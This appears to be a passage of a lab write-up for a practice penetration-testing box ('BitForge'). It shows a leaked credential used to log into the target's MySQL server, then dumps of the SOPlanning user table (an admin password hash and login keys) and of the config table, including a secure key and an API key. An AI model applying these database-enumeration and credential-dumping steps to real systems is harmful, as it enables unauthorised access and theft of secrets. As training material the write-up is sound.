MySQL
Nmap discovered a MySQL server on the target port 3306
The running service is MySQL 8.0.40-0ubuntu0.24.04.1
No credential is known at this time
BitForgeAdmin Session
The DB credential has been leaked; BitForgeAdmin:B1tForG3S0ftw4r3S0lutions
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bitforge]
└─$ mysql -h $IP -u BitForgeAdmin -pB1tForG3S0ftw4r3S0lutions
ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bitforge]
└─$ mysql --skip-ssl -h $IP -u BitForgeAdmin -pB1tForG3S0ftw4r3S0lutions
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 116
Server version: 8.0.40-0ubuntu0.24.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> Session established
MySQL [(none)]> show databases;
+----------------------+
| Database |
+----------------------+
| bitforge_customer_db |
| information_schema |
| performance_schema |
| soplanning |
+----------------------+
4 rows in set (0.023 sec)It would appear that the current DB user has access to both the BitForge Solutions and SOPlanning web apps
bitforge_customer_db DB
MySQL [(none)]> use bitforge_customer_db;
Database changed
MySQL [bitforge_customer_db]> show tables;
Empty set (1.663 sec)The bitforge_customer_db DB is empty as expected as it is a dummy site
soplanning DB
MySQL [bitforge_customer_db]> show tables;
Empty set (1.663 sec)
MySQL [bitforge_customer_db]> use soplanning;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [soplanning]> show tables;
+----------------------------+
| Tables_in_soplanning |
+----------------------------+
| planning_audit |
| planning_config |
| planning_ferie |
| planning_groupe |
| planning_lieu |
| planning_periode |
| planning_projet |
| planning_projet_user_tarif |
| planning_ressource |
| planning_right_on_user |
| planning_status |
| planning_user |
| planning_user_groupe |
+----------------------------+
13 rows in set (0.026 sec)planning_user
planning_user Table
MySQL [soplanning]> SELECT login,password,cle FROM planning_user;
+-------+------------------------------------------+----------------------------------+
| login | password | cle |
+-------+------------------------------------------+----------------------------------+
| admin | 77ba9273d4bcfa9387ae8652377f4c189e5a47ee | dbee8fd60fd4244695084bd84a996882 |
| NULL | NULL | 181ba036234dcccd78a2c7f540928a0f |
| NULL | NULL | bdcf6ee6918de4347aa34b7b533119d9 |
| NULL | NULL | cb284acc53164275d8cbb61fb090daf8 |
| NULL | NULL | 2eb523102046905d137e264e1eda0a43 |
+-------+------------------------------------------+----------------------------------+
5 rows in set (0.023 sec)Credential hash of the admin user identified; 77ba9273d4bcfa9387ae8652377f4c189e5a47ee
There is also an interesting column, cle, containing a hashstring; dbee8fd60fd4244695084bd84a996882
hashcat was unable to crack the password hash
Vulnerabilities
/Practice/BitForge/2-Enumeration/attachments/{4907BE52-7767-4DB0-8DDD-C33C535FDE5D}.png)
Looking more into the presence of the unusual cle column reveals an article showcasing several vulnerabilities, including authentication bypass
planning_config Table
MySQL [soplanning]> SELECT * FROM planning_config;
+----------------------------------------+--------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------+
| cle | valeur | commentaire |
+----------------------------------------+--------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------+
| CONTACT_FORM_DEACTIVATE | | Put 1 to deactivate the display of the small button/popin (contact form) |
| CURRENT_VERSION | 1.52.01 | Internal key for auto upgrade control |
| DAYS_INCLUDED | 1,2,3,4,5 | Define the days included to count duration. IMPORTANT : 0=sunday, 1=monday, 2=tuesday, 3=wenesday, 4=thursday, 5=friday, 6=saturday |
| DEFAULT_NB_DAYS_DISPLAYED | 2 | Default number of days displayed in the planning view by day |
| DEFAULT_NB_MONTHS_DISPLAYED | 2 | Default number of months displayed in the planning |
| DEFAULT_NB_ROWS_DISPLAYED | 100 | Default number of rows displayed in the planning |
| DEFAULT_PERIOD_LINK | | Default value for link in a period |
| DURATION_AM | 04:00 | Morning duration when calculating worked hours |
| DURATION_DAY | 09:00 | Duration when only one day is selected |
| DURATION_PM | 05:00 | Afternoon duration when calculating worked hours |
| GOOGLE_2FA_ACTIVE | 0 | |
| GOOGLE_OAUTH_ACTIVE | 0 | |
| GOOGLE_OAUTH_CLIENT_ID | | |
| GOOGLE_OAUTH_CLIENT_SECRET | | |
| HOURS_DISPLAYED | 8,9,10,11,14,15,16,17 | List of hours displayed in the day view |
| LOGOUT_REDIRECT | | Optional redirect url after logout (for exemple to return on your own intranet). ex : http://www.google.com |
| NOTIFICATION_EMAIL_COCHE | 1 | Default state for notification checkbox in task form |
| PLANNING_AFFICHAGE_STATUS | aucun | Show status |
| PLANNING_CELL_FONTSIZE | 0 | Cell Font size |
| PLANNING_CODE_WIDTH | 5 | Code width |
| PLANNING_CODE_WIDTH_LARGE | 5 | Code width large mode |
| PLANNING_COL_WIDTH | 25 | Planning col width |
| PLANNING_COL_WIDTH_LARGE | 130 | Planning col width large mode |
| PLANNING_COULEUR_TACHE | 0 | Task Color |
| PLANNING_DATE_FORMAT | 1 | Date Format |
| PLANNING_DIFFERENCIE_TACHE_COMMENTAIRE | 0 | Task comment |
| PLANNING_DIFFERENCIE_TACHE_LIEN | 1 | Task link |
| PLANNING_DIFFERENCIE_TACHE_PARTIELLE | 1 | Half Task |
| PLANNING_DIFFERENCIE_WEEKEND | 1 | Week-end class activate |
| PLANNING_DUREE_CRENEAU_HORAIRE | 30 | Time duration |
| PLANNING_HIDE_WEEKEND_TASK | 0 | Hide weekend task |
| PLANNING_LINE_HEIGHT | | Default line height in the planning. If not specified, it fits the username height |
| PLANNING_MASQUER_FERIES | 0 | Hide holidays |
| PLANNING_ONE_ASSIGNMENT_MAX_PER_DAY | 0 | Option to display only one assignment/task per cell/day in the planning (put "1" to activite this option) |
| PLANNING_PAGES | 1,5,10,20,50,100 | rows per page in the planning |
| PLANNING_REPEAT_HEADER | 0 | If > 0, repeat header (days/months) in the planning each x lines |
| PLANNING_TEXTE_TACHES_LIEU | code_projet | Cell text location |
| PLANNING_TEXTE_TACHES_PERSONNE | code_projet | Cell text user |
| PLANNING_TEXTE_TACHES_PROJET | code_personne | Cell text project |
| PLANNING_TEXTE_TACHES_RESSOURCE | code_projet | Cell text resource |
| PROJECT_COLORS_POSSIBLE | | color choice limitation for planner (empty for no limit). Exemple :#ff0000,#aa8811,#446622 |
| REFRESH_TIMER | 600 | refresh time for the planning page (time in second) |
| SECURE_KEY | a5eaea3ccc1268f62d081460bb32fb67 | String used only for security matters |
| SEMAPHORE_ACTIVATED | 0 | Activated in order to avoid periode_id crossing when creating a lot of tasks at the same time |
| SMTP_FROM | notification@yourdomain.com | |
| SMTP_HOST | localhost | |
| SMTP_LOGIN | | |
| SMTP_PASSWORD | | |
| SMTP_PORT | | |
| SMTP_SECURE | | |
| SOPLANNING_API_KEY_NAME | SOPLANNING-API | |
| SOPLANNING_API_KEY_VALUE | 0b6038ad-d400-11ef-bf32-00505695ee43 | |
| SOPLANNING_LOGO | | Logo |
| SOPLANNING_OPTION_ACCES | 0 | Public access |
| SOPLANNING_OPTION_AUDIT | 1 | Audit module |
| SOPLANNING_OPTION_AUDIT_CONNEXIONS | 1 | Audit connexion |
| SOPLANNING_OPTION_AUDIT_EQUIPES | 1 | Audit team |
| SOPLANNING_OPTION_AUDIT_GROUPES | 1 | Audit project group |
| SOPLANNING_OPTION_AUDIT_LIEUX | 1 | Audit location |
| SOPLANNING_OPTION_AUDIT_PROJETS | 1 | Audit project |
| SOPLANNING_OPTION_AUDIT_RESSOURCES | 1 | Audit ressource |
| SOPLANNING_OPTION_AUDIT_RETENTION | 30 | Audit retention |
| SOPLANNING_OPTION_AUDIT_STATUTS | 1 | Audit status |
| SOPLANNING_OPTION_AUDIT_TACHES | 1 | Audit tasks |
| SOPLANNING_OPTION_AUDIT_UTILISATEURS | 1 | Audit users |
| SOPLANNING_OPTION_LIEUX | 1 | Location Option |
| SOPLANNING_OPTION_RESSOURCES | 1 | Ressource Option |
| SOPLANNING_OPTION_TACHES | 1 | Task Option |
| SOPLANNING_OPTION_VISITEUR | 0 | Visitor can add or update task |
| SOPLANNING_THEME | soplanning.css | Default theme |
| SOPLANNING_TITLE | SOPlanning | Change the title of Soplanning for integration in extranet |
| SOPLANNING_URL | | Your SOPlanning instance url, to be able to send email with links |
| TIMEZONE | Europe/Paris | Timezone |
+----------------------------------------+--------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------+
73 rows in set (0.026 sec)SECURE_KEY:a5eaea3ccc1268f62d081460bb32fb67SOPLANNING_API_KEY_NAME:SOPLANNING-APISOPLANNING_API_KEY_VALUE:0b6038ad-d400-11ef-bf32-00505695ee43